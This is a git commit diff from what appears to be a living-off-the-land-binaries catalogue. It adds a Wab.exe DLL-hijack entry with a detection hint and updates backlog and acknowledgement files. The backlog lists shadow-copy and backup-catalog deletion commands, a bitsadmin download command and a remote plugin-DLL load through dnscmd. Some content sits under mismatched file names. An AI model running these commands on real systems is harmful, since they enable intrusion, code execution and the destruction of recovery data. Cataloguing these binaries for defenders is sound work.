Cleaning and adding Wab.exe

Author: Oddvar Moe

Backlog.txt

@@ -3,7 +3,6 @@ Kd.exe			Debugger
 Certreq.exe		Exfiltrate data
 Dbghost.exe
 Robocopy.exe	Needs examples
-Bitsadmin.exe	bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
 Vssadmin.exe	vssadmin.exe Delete Shadows /All /Quiet
 notepad.exe		Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
 wbadmin.exe 	wbadmin delete catalog -quiet
@@ -15,3 +14,5 @@ WseClientSvc.exe	- https://blog.huntresslabs.com/abusing-trusted-applications-a7
 dvdplay.exe		http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
 http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
 https://twitter.com/Hexacorn/status/993498264497541120
+https://twitter.com/Hexacorn/status/994000792628719618
+https://github.com/MoooKitty/Code-Execution

LOLBins.md

@@ -46,12 +46,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Presentationhost.exe](OSBinaries/Presentationhost.md)     
 [Print.exe](OSBinaries/Print.md)  
 [Psr.exe](OSBinaries/Psr.md)  
-[Qprocess.exe](OSBinaries/Qprocess.md)     
 [Reg.exe](OSBinaries/Reg.md)    
 [Regedit.exe](OSBinaries/Regedit.md)    
 [Regasm.exe](OSBinaries/Regasm.md)    
 [Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)        
-[Regini.exe](OSBinaries/Regini.md)    
 [Regsvcs.exe](OSBinaries/Regsvcs.md)    
 [Regsvr32.exe](OSBinaries/Regsvr32.md)    
 [Replace.exe](OSBinaries/Replace.md)     
@@ -63,6 +61,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Sc.exe](OSBinaries/Sc.md)     
 [Scriptrunner.exe](OSBinaries/Scriptrunner.md)     
 [Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)     
+[Wab.exe](OSBinaries/Wab.md)     
 [Wmic.exe](OSBinaries/Wmic.md)     
 [Wscript.exe](OSBinaries/Wscript.md)    
 [Xwizard.exe](OSBinaries/Xwizard.md)     

OSBinaries/Dnscmd.md

@@ -7,15 +7,19 @@ dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
 ```
 
 Acknowledgements:
-* Dimitrios Slamaris - @dim0x69
+* Shay Ber - ?   
+* Dimitrios Slamaris - @dim0x69    
+* Nikhil SamratAshok Mittal - @nikhil_mitt   
 
 Code sample:
 * 
 
 Resources:
+* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
 * https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
 * https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
 * https://twitter.com/Hexacorn/status/994000792628719618
+* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
 
 Full path:
 ```

OSBinaries/Qprocess.md

@@ -0,0 +1,38 @@
+## Wab.exe
+
+* Functions: Execute
+
+```
+Wab.exe (requires registry changes)
+```
+
+Acknowledgements:
+* Adam - @Hexacorn
+
+Code sample:
+* 
+
+Resources:
+* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
+* https://twitter.com/Hexacorn/status/991447379864932352
+
+Full path:
+```
+C:\Program Files\Windows Mail\wab.exe    
+C:\Program Files (x86)\Windows Mail\wab.exe    
+```
+
+Notes:
+Searches for wab.dll. Can be manipulated with the following registry key:
+```
+HKLM\Software\Microsoft\WAB\DLLPath
+```
+
+Binary is used to manage Windows contacts/wab files. (Legacy)
+
+
+Detection:
+Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath
+
+
+ 

OSBinaries/Regini.md

@@ -21,11 +21,13 @@ Resources:
 
 Full path:
 ```
-C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
+C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe   
+
+C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe   
 ```
 
 Notes:
-
+Part of SQL server, but also Office in some versions.